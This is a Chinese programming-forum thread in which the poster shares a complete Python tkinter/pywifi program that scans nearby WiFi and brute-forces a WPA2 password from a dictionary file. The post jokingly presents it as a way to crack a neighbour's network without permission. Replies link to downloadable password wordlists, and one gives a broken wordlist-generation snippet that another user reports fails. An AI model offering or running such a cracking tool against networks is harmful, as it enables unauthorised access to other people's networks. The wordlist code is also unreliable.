鱼C论坛

 找回密码
 立即注册
查看: 3992|回复: 26

[作品展示] 今天我家断网,于是我动邪念破解了对面小姐姐的WIFI —— pywifi破解WIFI密码

[复制链接]
发表于 2020-8-14 10:17:53 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
本帖最后由 liaozuhen 于 2020-8-30 10:49 编辑

在一个月黑风高伸手不见五指的夜晚我正在上小甲鱼的课程,突然停网了!
对于网络达人来说这能忍不
不能!
于是我就写了了这段代码破解了对面小姐姐的WIFI密码!





  1. from tkinter import *
  2. from tkinter import ttk
  3. import pywifi
  4. from pywifi import const
  5. import time
  6. import tkinter.filedialog # 在Gui中打开文件浏览
  7. import tkinter.messagebox # 打开tkiner的消息提醒框

  8. class MY_GUI():
  9.         def __init__(self,init_window_name):
  10.                 self.init_window_name = init_window_name

  11.                 #密码文件路径
  12.                 self.get_value = StringVar() # 设置可变内容

  13.                 #获取破解wifi账号
  14.                 self.get_wifi_value = StringVar()

  15.                 #获取wifi密码
  16.                 self.get_wifimm_value = StringVar()

  17.                 self.wifi = pywifi.PyWiFi()  #抓取网卡接口
  18.                 self.iface = self.wifi.interfaces()[0] #抓取第一个无线网卡
  19.                 self.iface.disconnect()  #测试链接断开所有链接
  20.                 time.sleep(1)  #休眠1秒
  21.                 #测试网卡是否属于断开状态
  22.                 assert self.iface.status() in\
  23.                                 [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]

  24.         def __str__(self):
  25.         # 自动会调用的函数,返回自身的网卡
  26.                 return '(WIFI:%s,%s)' % (self.wifi,self.iface.name())

  27.         #设置窗口
  28.         def set_init_window(self):
  29.                 self.init_window_name.title("WIFI破解工具")
  30.                 self.init_window_name.geometry('+500+200')

  31.                 labelframe = LabelFrame(width=400, height=200,text="配置")  # 框架,以下对象都是对于labelframe中添加的
  32.                 labelframe.grid(column=0, row=0, padx=10, pady=10)

  33.                 self.search = Button(labelframe,text="搜索附近WiFi",command=self.scans_wifi_list).grid(column=0,row=0)

  34.                 self.pojie = Button(labelframe,text="开始破解",command=self.readPassWord).grid(column=1,row=0)

  35.                 self.label = Label(labelframe,text="目录路径:").grid(column=0,row=1)

  36.                 self.path = Entry(labelframe,width=12,textvariable = self.get_value).grid(column=1,row=1)

  37.                 self.file = Button(labelframe,text="添加密码文件目录",command=self.add_mm_file).grid(column=2,row=1)

  38.                 self.wifi_text = Label(labelframe,text="WiFi账号:").grid(column=0,row=2)

  39.                 self.wifi_input = Entry(labelframe,width=12,textvariable = self.get_wifi_value).grid(column=1,row=2)

  40.                 self.wifi_mm_text = Label(labelframe,text="WiFi密码:").grid(column=2,row=2)

  41.                 self.wifi_mm_input = Entry(labelframe,width=10,textvariable = self.get_wifimm_value).grid(column=3,row=2,sticky=W)

  42.                 self.wifi_labelframe = LabelFrame(text="wifi列表")
  43.                 self.wifi_labelframe.grid(column=0, row=3,columnspan=4,sticky=NSEW)


  44.                 # 定义树形结构与滚动条
  45.                 self.wifi_tree = ttk.Treeview(self.wifi_labelframe,show="headings",columns=("a", "b", "c", "d"))
  46.                 self.vbar = ttk.Scrollbar(self.wifi_labelframe, orient=VERTICAL, command=self.wifi_tree.yview)
  47.                 self.wifi_tree.configure(yscrollcommand=self.vbar.set)

  48.                 # 表格的标题
  49.                 self.wifi_tree.column("a", width=50, anchor="center")
  50.                 self.wifi_tree.column("b", width=100, anchor="center")
  51.                 self.wifi_tree.column("c", width=100, anchor="center")
  52.                 self.wifi_tree.column("d", width=100, anchor="center")

  53.                 self.wifi_tree.heading("a", text="WiFiID")
  54.                 self.wifi_tree.heading("b", text="SSID")
  55.                 self.wifi_tree.heading("c", text="BSSID")
  56.                 self.wifi_tree.heading("d", text="signal")

  57.                 self.wifi_tree.grid(row=4,column=0,sticky=NSEW)
  58.                 self.wifi_tree.bind("<Double-1>",self.onDBClick)
  59.                 self.vbar.grid(row=4,column=1,sticky=NS)

  60.         #搜索wifi
  61.         #cmd /k C:\Python27\python.exe "$(FULL_CURRENT_PATH)" & PAUSE & EXIT
  62.         def scans_wifi_list(self):  # 扫描周围wifi列表
  63.                 #开始扫描
  64.                 print("^_^ 开始扫描附近wifi...")
  65.                 self.iface.scan()
  66.                 time.sleep(15)
  67.                 #在若干秒后获取扫描结果
  68.                 scanres = self.iface.scan_results()
  69.                 #统计附近被发现的热点数量
  70.                 nums = len(scanres)
  71.                 print("数量: %s"%(nums))
  72.                 #print ("| %s |  %s |  %s | %s"%("WIFIID","SSID","BSSID","signal"))
  73.                 # 实际数据
  74.                 self.show_scans_wifi_list(scanres)
  75.                 return scanres

  76.         #显示wifi列表
  77.         def show_scans_wifi_list(self,scans_res):
  78.                 for index,wifi_info in enumerate(scans_res):
  79.             # print("%-*s| %s | %*s |%*s\n"%(20,index,wifi_info.ssid,wifi_info.bssid,,wifi_info.signal))
  80.                         self.wifi_tree.insert("",'end',values=(index + 1,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))
  81.                         #print("| %s | %s | %s | %s \n"%(index,wifi_info.ssid,wifi_info.bssid,wifi_info.signal))

  82.         #添加密码文件目录
  83.         def add_mm_file(self):
  84.                 self.filename = tkinter.filedialog.askopenfilename()
  85.                 self.get_value.set(self.filename)

  86.         #Treeview绑定事件
  87.         def onDBClick(self,event):
  88.                 self.sels= event.widget.selection()
  89.                 self.get_wifi_value.set(self.wifi_tree.item(self.sels,"values")[1])
  90.                 #print("you clicked on",self.wifi_tree.item(self.sels,"values")[1])

  91.         #读取密码字典,进行匹配
  92.         def readPassWord(self):
  93.                 self.getFilePath = self.get_value.get()

  94.                 self.get_wifissid = self.get_wifi_value.get()

  95.                 pwdfilehander=open(self.getFilePath,"r",errors="ignore")
  96.                 while True:
  97.                                 try:
  98.                                         self.pwdStr=pwdfilehander.readline()

  99.                                         if not self.pwdStr:
  100.                                                 break
  101.                                         self.bool1=self.connect(self.pwdStr,self.get_wifissid)

  102.                                         if self.bool1:
  103.                                                 self.res = "===正确===  wifi名:%s  匹配密码:%s "%(self.get_wifissid,self.pwdStr)
  104.                                                 self.get_wifimm_value.set(self.pwdStr)
  105.                                                 tkinter.messagebox.showinfo('提示', '破解成功!!!')
  106.                                                 print(self.res)
  107.                                                 break
  108.                                         else:
  109.                                                 self.res = "---错误--- wifi名:%s匹配密码:%s"%(self.get_wifissid,self.pwdStr)
  110.                                                 print(self.res)
  111.                                         sleep(3)
  112.                                 except:
  113.                                         continue
  114.         #对wifi和密码进行匹配
  115.         def connect(self,pwd_Str,wifi_ssid):
  116.                 #创建wifi链接文件
  117.                 self.profile = pywifi.Profile()
  118.                 self.profile.ssid =wifi_ssid #wifi名称
  119.                 self.profile.auth = const.AUTH_ALG_OPEN  #网卡的开放
  120.                 self.profile.akm.append(const.AKM_TYPE_WPA2PSK)#wifi加密算法
  121.                 self.profile.cipher = const.CIPHER_TYPE_CCMP    #加密单元
  122.                 self.profile.key = pwd_Str #密码
  123.                 self.iface.remove_all_network_profiles() #删除所有的wifi文件
  124.                 self.tmp_profile = self.iface.add_network_profile(self.profile)#设定新的链接文件
  125.                 self.iface.connect(self.tmp_profile)#链接
  126.                 time.sleep(5)
  127.                 if self.iface.status() == const.IFACE_CONNECTED:  #判断是否连接上
  128.                         isOK=True
  129.                 else:
  130.                         isOK=False
  131.                 self.iface.disconnect() #断开
  132.                 time.sleep(1)
  133.                 #检查断开状态
  134.                 assert self.iface.status() in\
  135.                                 [const.IFACE_DISCONNECTED, const.IFACE_INACTIVE]
  136.                 return isOK

  137. def gui_start():
  138.         init_window = Tk()
  139.         ui = MY_GUI(init_window)
  140.         print(ui)
  141.         ui.set_init_window()
  142.         #ui.scans_wifi_list()

  143.         init_window.mainloop()

  144. gui_start()


复制代码




密码本:https://download.csdn.net/download/weixin_38988214/10925187

pywifi这个模块要先用pip来安装一下

评分

参与人数 3荣誉 +3 鱼币 +3 收起 理由
1molHF + 1 + 1 感谢楼主无私奉献!
nahongyan1997 + 1 + 1 鱼C有你更精彩^_^
青松100 + 1 + 1 鱼C有你更精彩^_^

查看全部评分

本帖被以下淘专辑推荐:

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

 楼主| 发表于 2020-8-28 15:00:11 | 显示全部楼层
本帖最后由 liaozuhen 于 2020-10-6 20:39 编辑
疾风怪盗 发表于 2020-8-28 14:25
密码本能共享下么?那个链接的无法下载啊


密码本不行的朋友可以这样做:
创建一个叫pythonpywifi的文件
然后把这个文件放到以下代码的文件夹中
  1. open(w,"pythonpywifi")
  2. for i in range(10000000,9999999999999999):
  3.     pythonpywifi.write(i)
  4. pythonpywifi.close()
复制代码

完成之后运行代码,点击片加密码文件目录添加文件就可以啦
注:此方法很傻,千万不要使用 ,其实我也没有密码本!
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-11-14 20:28:05 | 显示全部楼层
liaozuhen 发表于 2020-8-28 15:00
密码本不行的朋友可以这样做:
创建一个叫pythonpywifi的文件
然后把这个文件放到以下代码的文件夹中 ...

爸爸送你一个:
链接:https://pan.baidu.com/s/109zrwbeC6eCwxEX--8girQ
提取码:96dy
注意:txt文件很大,无法直接打开

评分

参与人数 2荣誉 +1 鱼币 +2 收起 理由
liaozuhen + 1 鱼C有你更精彩^_^
青松100 + 1 + 1 鱼C有你更精彩^_^

查看全部评分

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 1 反对 0

使用道具 举报

发表于 2020-8-14 11:41:19 From FishC Mobile | 显示全部楼层
支持一下
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-8-14 21:41:31 From FishC Mobile | 显示全部楼层
不是写得多我就看得懂的
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-8-15 08:48:02 | 显示全部楼层
lovejin11 发表于 2020-8-14 21:41
不是写得多我就看得懂的

看不懂也没关系,让我们一起进步吧
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-8-15 09:01:30 From FishC Mobile | 显示全部楼层
python3编译器最多116行,没电脑难受
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-8-15 09:07:49 | 显示全部楼层
本帖最后由 liaozuhen 于 2020-8-15 13:10 编辑
绝世黑 发表于 2020-8-15 09:01
python3编译器最多116行,没电脑难受


python3.8.5或pycharm试一下
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-8-28 09:45:03 | 显示全部楼层
自占沙发
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-8-28 10:59:44 | 显示全部楼层
这个厉害了
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-8-28 12:51:39 | 显示全部楼层

多谢夸奖
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-8-28 14:25:30 | 显示全部楼层
密码本能共享下么?那个链接的无法下载啊
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-8-28 15:14:10 | 显示全部楼层
liaozuhen 发表于 2020-8-28 15:00
创建一个叫pythonpywifi的文件
然后把这个文件放到以下代码的文件夹中

收到,谢谢
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

 楼主| 发表于 2020-8-30 09:34:30 | 显示全部楼层
自己给自己顶一下
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-9-5 11:43:39 | 显示全部楼层
这个密码本没有英文字母啊
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 1 反对 0

使用道具 举报

发表于 2020-9-8 20:10:56 | 显示全部楼层
确实这个密码本只有数字...所以它的原理是一个个尝试吗....
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-9-14 20:45:49 | 显示全部楼层
你好,为什么我破解不了
WiFi.png
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-11-14 15:57:40 | 显示全部楼层
liaozuhen 发表于 2020-8-28 15:00
密码本不行的朋友可以这样做:
创建一个叫pythonpywifi的文件
然后把这个文件放到以下代码的文件夹中 ...

报错了:
open('w',"pythonpywifi")
ValueError: invalid mode: 'pythonpywifi'
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-11-14 19:11:25 | 显示全部楼层
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复 支持 反对

使用道具 举报

发表于 2020-11-14 19:51:52 | 显示全部楼层
666
想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-5-6 17:33

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表